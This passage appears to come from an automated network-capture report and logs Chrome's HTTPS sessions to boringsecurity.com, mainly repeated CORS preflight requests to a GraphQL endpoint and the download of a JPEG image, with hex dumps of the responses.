                                                                          2023-12-10 16:44:52 UTC5930INData Raw: e1 5c c9 57 2b 0c ca f8 25 72 75 92 92 b6 a5 74 2f 54 98 20 16 29 b4 8a 9c 48 72 7a bc 59 96 04 80 03 68 59 4a 32 b4 00 60 43 94 67 2c 7a 9c be a7 3d 3f 65 e3 3d 9f 09 57 ce 7e 8d f3 9d 41 35 d6 a9 46 5b ca 94 65 51 68 2c 94 64 08 21 81 42 09 5e 7b e8 b2 ab 2b b3 2e c7 ac f1 dd ad 6f 9c 93 cf 94 df 81 b5 b6 38 6d 74 9a 4f 3c 42 16 cc b7 17 23 8a 07 72 72 49 c0 8b 7a 9c 7e c7 3f 4e a2 32 e1 ea 79 35 53 61 a6 b9 ef 3e 5b 57 46 3d a5 86 ea ab 0d 5d 3a 97 91 4f 43 25 b0 85 9c fd 3a 3c ce 2e ad f3 64 ed b8 3a b4 5f ce fa ac db 31 78 7b eb 52 25 e3 43 bb 8f bc c5 2e a1 2f 3e 5b d2 71 fb 58 f6 f3 0c 33 72 e9 cd ab 50 4d 44 73 e8 cf 5c 8e 2f 6b 8b db 1c bc fa 73 7a f9 cf d1 79 df 45 8d 77 b8 de 99 79 f5 e3 a3 ea e9 de 7c cc bd 20 79 de 8f 66 f9 68 b8 39 68 21 33
                                                                          Data Ascii: \W+%rut/T )HrzYhYJ2`Cg,z=?e=W~A5F[eQh,d!B^{+.o8mtO<B#rrIz~?N2y5Sa>[WF=]:OC%:<.d:_1x{R%C./>[qX3rPMDs\/kszyEwy| yfh9h!3
                                                                          2023-12-10 16:44:52 UTC7116INData Raw: 6f d0 eb f3 1d 3c e7 a9 13 9d 26 6c 8d 6b a1 09 aa e5 e1 e8 72 3a f0 ea fa de 57 4f cd a3 36 8c d8 d6 7f 27 ea 7c d7 a3 9c 3a 7c 8d bd 73 af 36 85 9b cc f6 5e 47 d7 f3 d1 7e 6d 1e 7d 92 80 a8 50 b9 da 84 be 13 99 d3 e6 7b 38 cf d6 f9 2f 5b 9d 77 b2 ea cd e6 de 88 8d 4e a7 0f b1 df 8a 81 1b 1a 8a 89 10 0f 1f d5 cf 7e 9d 7c 7d 0c 05 96 d7 6c b6 29 58 94 6b e6 f4 c1 b2 23 19 a2 ba ed ac a7 99 d4 e5 e9 75 06 df 6f 9f bd d0 94 79 f4 39 7d 2e 02 f4 f5 e6 a3 9b 66 1a f9 fc ef a1 8d 2f c5 d6 d3 91 83 96 bd 2f 1f 81 a3 ad dd dd b4 e2 00 c3 ce 79 2f 6b e6 fd 8d 3a b0 e9 eb e7 cb b3 16 8e 3d 78 dd 4e 4f 4f a5 f2 f1 6b d7 ce 6d 12 a6 81 82 59 08 18 04 9c 5c a2 11 3d 78 f5 dc 73 15 90 ab 7d b7 90 f4 b9 6c cd 7f 2a 33 27 9f a6 6a cf 7e 1b 27 3a 63 2e cb 39 f2 b3 a1 0c
                                                                          Data Ascii: o<&lkr:WO6'|:|s6^G~m}P{8/[wN~|}l)Xk#uoy9}.f//y/k:=xNOOkmY\=xs}l*3'j~':c.9
                                                                          2023-12-10 16:44:52 UTC6296INData Raw: 3c bd d5 d7 75 7c 77 ad eb b9 be 6b 2b 2b 2b 2b 6c 5b 0f c4 70 18 30 ee 7f 1d ea e5 6f c4 ab a6 70 1c 2f 8e fc 6c ad 81 e6 f6 bb 8e 5c 2d b6 76 6d b5 6c 2d 80 e3 f9 7b 07 82 ec de 78 c5 d0 e3 ed 3b 95 76 6e 1f 92 18 95 f9 5b 0b 2b 2b 2b 6c 04 de 21 0d ae e7 0e ee e4 f6 fb fe 7d bb fb 36 df f9 5b 78 1e cb b0 1c 30 1e cb 76 bb 6c 84 36 ad 85 b0 08 70 b7 b3 da 4e 9f 6f 65 bc cb bb 78 2e db 5d ce 0e e1 6d ea ca db 63 99 dc fe d1 e0 38 0c 4f 0d 8b 22 80 4d e0 17 7f 61 dc c8 fb 43 68 ec 1f 77 ba ef f9 7b 07 86 0d ea 43 c5 bc 7d 9e ce e0 bb 37 0f c9 01 b1 f9 7b 23 83 78 8f 64 2f c9 dc 9e e7 e7 db da ef f9 f7 f6 4f 0e c3 87 b5 dd 9b 5d b6 7b fb 5d 9b c3 d9 0a 4e 41 ed 0e 65 dd bc 17 6f 63 bb b8 77 f6 47 17 73 8f 68 f0 1c bd f0 3e c3 78 2e fe c3 b9 91 f6 86 d1 d8
                                                                          Data Ascii: <u|wk++++l[p0op/l\-vml-{x;vn[+++l!}6[x0vl6pNoex.]mc8O"MaChw{C}7{#xd/O]{]NAeocwGsh>x.
                                                                          2023-12-10 16:44:52 UTC2INData Raw: 0d 0a
                                                                          Data Ascii:
                                                                          2023-12-10 16:44:52 UTC4096INData Raw: 37 38 30 66 0d 0a 47 45 20 a9 86 45 05 43 5c d7 d6 41 18 9f c4 1f 22 e0 3c 36 1b 60 15 2f 4b 62 c9 d4 8c 95 37 c3 a9 d8 54 73 c9 1a b5 41 7d 2e fa 6f c1 dd 6a 8e ba 0a 97 74 cf 93 51 70 42 27 15 1c 4d d7 34 91 a9 a0 30 b3 89 63 ee a6 65 c2 a0 97 0a ce 6a 8e 44 ce 57 72 49 d2 9b a3 07 4b fc 66 a0 71 fe bf e2 38 ec 9e 1e 0f c3 c4 be 07 82 fc 9c 3c 6b e5 78 6f ff 00 3f c4 be 04 9d 44 10 c2 db da 2d 81 5f b5 dc c9 a8 a3 ce 98 bb fb 71 8c d3 6d 59 65 56 47 70 36 68 b6 db 1b 98 9b 26 ee 45 3c 59 d8 37 71 e0 7d ab aa b7 5e 4d a1 b4 fe 46 f2 fe f5 59 f0 fb 60 cd 8e ff 00 98 db ee a5 e6 43 84 7c fe ed 34 1a 84 0b 0c 1c c3 1c 94 db aa 13 3e 40 c6 5e 8c 7d 2e 2a 68 59 3b 26 83 ca cb e0 f0 26 30 87 3c 5d 94 d1 ea 4c c8 da c5 33 5a e7 8a 47 2a 9f 0f d4 8a 13 b1 37 23
                                                                          Data Ascii: 780fGE EC\A"<6`/Kb7TsA}.ojtQpB'M40cejDWrIKfq8<kxo?D-_qmYeVGp6h&E<Y7q}^MFY`C|4>@^}.*hY;&&0<]L3ZG*7#


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          108192.168.2.54984523.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC520OUTOPTIONS /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 31 35 33 36 30 30 30 0d 0a 41 63 63 65 73 73 2d
                                                                          Data Ascii: HTTP/1.1 204 No ContentServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTConnection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 31536000Access-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          109192.168.2.54984123.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC520OUTOPTIONS /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 31 35 33 36 30 30 30 0d 0a 41 63 63 65 73 73 2d
                                                                          Data Ascii: HTTP/1.1 204 No ContentServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTConnection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 31536000Access-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          110192.168.2.54984023.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC520OUTOPTIONS /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 31 35 33 36 30 30 30 0d 0a 41 63 63 65 73 73 2d
                                                                          Data Ascii: HTTP/1.1 204 No ContentServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTConnection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 31536000Access-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          111192.168.2.54984223.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC520OUTOPTIONS /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 31 35 33 36 30 30 30 0d 0a 41 63 63 65 73 73 2d
                                                                          Data Ascii: HTTP/1.1 204 No ContentServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTConnection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 31536000Access-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          112192.168.2.54984423.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC520OUTOPTIONS /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 31 35 33 36 30 30 30 0d 0a 41 63 63 65 73 73 2d
                                                                          Data Ascii: HTTP/1.1 204 No ContentServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTConnection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 31536000Access-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          113192.168.2.54984323.92.19.1444435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC520OUTOPTIONS /graphql/ HTTP/1.1
                                                                          Host: cms.boringsecurity.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://boringsecurity.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: same-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 4f 72 69 67 69 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 31 35 33 36 30 30 30 0d 0a 41 63 63 65 73 73 2d
                                                                          Data Ascii: HTTP/1.1 204 No ContentServer: nginx/1.18.0Date: Sun, 10 Dec 2023 16:44:58 GMTConnection: closeVary: OriginAccess-Control-Allow-Origin: https://boringsecurity.comAccess-Control-Allow-Credentials: trueAccess-Control-Max-Age: 31536000Access-


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          114192.168.2.54984775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC358OUTGET /images/grill.jpg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:52 UTC396INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 36 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 39 34 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 39 63 39 66 36 65 30 33 65 35 66 64 34 63 61 39 61 32 39 64 33 61 39 63 35 37
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50926Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 179404Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:52 GMTEtag: "9c9f6e03e5fd4ca9a29d3a9c57
                                                                          2023-12-10 16:44:52 UTC790INData Raw: ff d8 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0d 00 00 ff e1 03 1f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 39 63 63 63 34 64 65 39 33 2c 20 32 30 32 32 2f 30 33 2f 31 34 2d 31 34 3a 30 37 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78
                                                                          Data Ascii: ExifMM*Duckyhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF x
                                                                          2023-12-10 16:44:52 UTC2372INData Raw: 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ed 00 48 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 0f 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 02 00 38 42 49 4d 04 25 00 00 00 00 00 10 fc e1 1f 89 c8 b7 c9 78 2f 34 62 34 07 58 77 eb ff ee 00 21 41 64 6f 62 65 00 64 c0 00 00 00 01 03 00 10 03 02 03 06 00 00 59 04 00 01 57 25 00 02 bc cc ff db 00 84 00 13 10 10 18 11 18 26 17 17 26 30 25 1e 25 30 2c 25 24 24 25 2c 3b 33 33 33 33 33 3b 43 3e 3e 3e 3e 3e 3e 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 01 14 18 18 1f 1b 1f 25 18 18 25 34 25 1f 25 34 43 34 29 29 34
                                                                          Data Ascii: Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>HPhotoshop 3.08BIMZ%G8BIM%x/4b4Xw!AdobedYW%&&0%%0,%$$%,;33333;C>>>>>>CCCCCCCCCCCCCCCCCCCCCCCCCCCCC%%4%%4C4))4
                                                                          2023-12-10 16:44:52 UTC538INData Raw: 94 9a 42 42 91 10 e3 e2 6e a3 01 55 04 4a 6c 21 21 48 89 63 38 9b 9f a0 a6 8d 26 61 90 81 a8 04 9b 74 97 9f a6 22 9e 26 69 10 81 a8 05 13 74 97 9e 40 a2 a1 27 76 99 36 54 00 73 b4 93 5c 60 22 b0 27 a7 0c 93 aa 00 46 8e 24 26 98 08 b1 42 2a c6 11 75 22 72 ea c2 36 1b 45 22 d4 88 af 18 43 d4 e1 a8 b0 48 da 4e 10 9b 90 26 9d 61 07 51 c3 23 bd 64 8f e7 93 2a e4 0b 71 b0 f3 f9 e4 32 2f 41 24 b4 8d 04 8b b5 20 31 a4 41 cf 30 e2 f4 67 26 a8 68 21 1b 50 76 bf 48 35 cc 3a 4f 42 72 7b 17 41 e7 f5 8a 38 69 e2 12 6b 40 9a f4 13 da b7 10 75 40 6a ea c2 23 37 0a 45 c8 11 5e 30 87 a9 13 53 60 91 b0 da 25 36 a4 45 3a 64 5d 47 1b 3d 78 48 d2 60 85 d8 a1 2e 32 23 ea 38 e9 eb c2 56 91 88 0a d4 2c db a4 9c f2 32 7a b0 99 a4 42 06 a0 14 4d d2 5e 79 00 9a 70 9d da 44 f9 50 0b
                                                                          Data Ascii: BBnUJl!!Hc8&at"&it@'v6Ts\`"'F$&B*u"r6E"CHN&aQ#d*q2/A$ 1A0g&h!PvH5:OBr{A8ik@u@j#7E^0S`%6E:d]G=xH`.2#8V,2zBM^ypDP
                                                                          2023-12-10 16:44:52 UTC4744INData Raw: 0c 19 35 53 1d 4c f4 92 e1 88 f5 b4 04 39 6c 0a 7a 50 75 09 79 2f 16 0f 53 40 4b 96 d3 13 42 4d 72 9c 4d db a3 90 f5 8a 7a 9a 0a 9e a0 98 0d 25 dd d1 c8 a1 22 e8 4b 85 ad ea 0c b0 c9 8b 88 6c f4 a0 17 a5 e2 96 e5 8c ee 22 73 c2 1b 3d 28 18 e9 1a 1a 73 0a b6 63 33 55 c5 60 2a 36 89 48 a1 1c 05 07 23 8c e5 71 58 02 83 a2 43 1f 3f 09 49 4a c3 09 3c 56 bc 48 74 48 c1 a9 c1 2a d9 4c e3 47 15 ab 50 32 88 da 31 23 85 7d 31 18 e9 b8 ad 5a 81 ce 8d e1 28 30 b3 11 c7 3a 5d 2b 4e a0 a1 91 d2 72 d5 c5 b8 90 09 f1 91 5a 35 05 47 15 60 8a 38 b8 56 a0 df 13 0a 91 c8 2b 38 6c 07 26 e2 e1 19 c6 d1 03 8a 11 89 2d d8 aa 04 a4 e2 e1 d8 8a 1f 05 03 92 0a 2e d8 de 61 c7 c5 c2 50 94 ba 0a 86 25 6b 2f e9 58 63 62 e2 f5 9c 25 4d 82 c3 54 91 2f e9 b4 d7 43 a5 ca 28 ca d9 05 a6 2d
                                                                          Data Ascii: 5SL9lzPuy/S@KBMrMz%"Kl"s=(sc3U`*6H#qXC?IJ<VHtH*LGP21#}1Z(0:]+NrZ5G`8V+8l&-.aP%k/Xcb%MT/C(-
